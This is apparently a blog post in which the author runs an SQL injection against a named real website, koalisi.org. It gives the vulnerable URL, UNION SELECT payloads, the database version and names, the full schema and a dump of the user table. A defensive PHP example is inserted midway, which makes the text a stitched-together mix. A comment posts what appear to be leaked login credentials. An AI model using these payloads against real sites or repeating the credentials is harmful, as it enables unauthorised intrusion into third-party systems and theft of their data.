Koalisi.org get down

Posted by syico | 12:54:00 PM

First, sorry to the admin of www.koalisi.org: I am using their website for penetration and, at the same time, to respond to a post on the bitsmikro forum. Relax, admin, I did not do anything to your website. Hahaha. Just wake up from your long sleep, then patch the website.

Target :
http://www.koalisi.org/berita.php?m=4&sm=17

SQLi bug:
http://www.koalisi.org/berita.php?m=4&sm=17'

error
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '\' ORDER BY date DESC LIMIT 0,3' at line 2

Find the magic number (hehehe):

http://www.koalisi.org/berita.php?m=4&sm=17+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7--

database version :
http://www.koalisi.org/berita.php?m=4&sm=17+AND+1=2+UNION+SELECT+@@version,1,2,3,4,5,6,7--
Version :
5.0.81-community-log

Database names:
koalisi_baru
koalisi_english

Select table from koalisi_baru

blocked: blockedid,ip,polls
cal: id,eventdate,html,title,event
diyur_catmenu: id,category,description,status
diyur_catnews: id,category,description,status
diyur_config: site_name,site_url,banner,site_logo,slogan,startdate,admin_mail,foot1,foot2,foot3,copyright,Version_Num
diyur_download: id,news_id,filename,description
diyur_iklan: id,customer_id,image,start_date,end_date,description
diyur_menu: id,catmenu_id,menu,link,status
diyur_news: id,menu_id,catnews_id,related_news_id,download_id,date,title,hometext,bodytext,image_big,image_small,pict_description,status,posted,agenda_tgl_mulai,agenda_jam_mulai,agenda_tgl_akhir,agenda_jam_akhir,agenda_lokasi
forum-old: pid,ip,author,subject,message,date,lastcomment,email,parent,ncomments,category
forum: pid,ip,author,subject,message,date,lastcomment,email,parent,ncomments,category
forum_cat: id,name,public
ip: ipid,title,ip,vote
jabatan: id,nama_jabatan,kategori,urut
kategori_mitra: id,nama_kategori,status
mitrakoalisi: id,judul,kategori,alamat,kota,telepon,fax,email,website,isi,status,tgl
options: optionid,pollid,options,images,votes,order_id
poll_pilihan: id,pollid,choice,ip,votes
poll_tanya: id,name,question,votes
polls: pollid,title,starts,expires,vote,voting,results,graph,resultsvotes,ip,cookies,subdate,status
struktur_org: id_jabatan,nama,keterangan
testimonial: id,title,link,Description
user: userid,nama,alamat,password,status,ket


Oops, look at this:
user: userid,nama,alamat,password,status,ket

Moving on, dump the user table; the fields are userid,password

blablabaa...

continuing...

found this:

userid : diyur
pass : (dangerous, so it is hidden)

NB: This post is for learning purposes only. Any negative effects that may arise are not my responsibility.
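What "patch the website" means for a numeric parameter like `sm`, as an added example that is not code from the post or from the site: the weak pattern escapes quotes but still pastes the value unquoted into the SQL text, while the corrected form validates it as an integer and binds it to a prepared statement. Assumptions: SQLite in memory stands in for MySQL, the `news` table and its row are constructed, the mapping of `m` and `sm` to `menu_id` and `catnews_id` is a guess, and the function names are hypothetical.

```php
<?php
// Added example. SQLite in memory stands in for the site's MySQL; the table,
// row and the m -> menu_id / sm -> catnews_id mapping are assumptions.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (id INTEGER, menu_id INTEGER, catnews_id INTEGER, date TEXT, title TEXT)');
$db->exec("INSERT INTO news VALUES (1, 4, 17, '2009-10-01', 'constructed headline')");

// Weak pattern: the value is escaped but then placed unquoted in the SQL text,
// so input that needs no quote character still becomes part of the statement.
function newsVulnerable(PDO $db, string $m, string $sm): array
{
    $m  = addslashes($m);
    $sm = addslashes($sm);
    $sql = "SELECT id, date, title FROM news
            WHERE menu_id = $m AND catnews_id = $sm ORDER BY date DESC LIMIT 0,3";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Corrected pattern: reject anything that is not a positive integer, then bind
// the values so they can never be parsed as SQL.
function newsHardened(PDO $db, string $m, string $sm): array
{
    $range = ['options' => ['min_range' => 1]];
    $mId   = filter_var($m, FILTER_VALIDATE_INT, $range);
    $smId  = filter_var($sm, FILTER_VALIDATE_INT, $range);
    if ($mId === false || $smId === false) {
        throw new InvalidArgumentException('m and sm must be positive integers');
    }
    $st = $db->prepare('SELECT id, date, title FROM news
                        WHERE menu_id = :m AND catnews_id = :sm ORDER BY date DESC LIMIT 3');
    $st->bindValue(':m', $mId, PDO::PARAM_INT);
    $st->bindValue(':sm', $smId, PDO::PARAM_INT);
    $st->execute();
    return $st->fetchAll(PDO::FETCH_NUM);
}

// A normal value, then the post's probe URL-decoded and cut to this table's 3 columns.
$inputs = ['17', '17 AND 1=2 UNION SELECT 0,1,2--'];
foreach ($inputs as $sm) {
    echo "sm=$sm\n  vulnerable: ", json_encode(newsVulnerable($db, '4', $sm)), "\n";
    try {
        echo "  hardened:   ", json_encode(newsHardened($db, '4', $sm)), "\n";
    } catch (InvalidArgumentException $e) {
        echo "  hardened:   rejected (", $e->getMessage(), ")\n";
    }
}
```

The backslash in the post's error text (`near '\' ORDER BY ...'`) is consistent with this weak pattern: the quote was escaped, yet it still reached the SQL parser because the parameter was not inside a quoted string.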

1 comments

  1. Anonymous // October 7, 2009 at 4:21 PM  

    UserName : ade
    Password : lingling

    Mr.Sakaw - Cyber666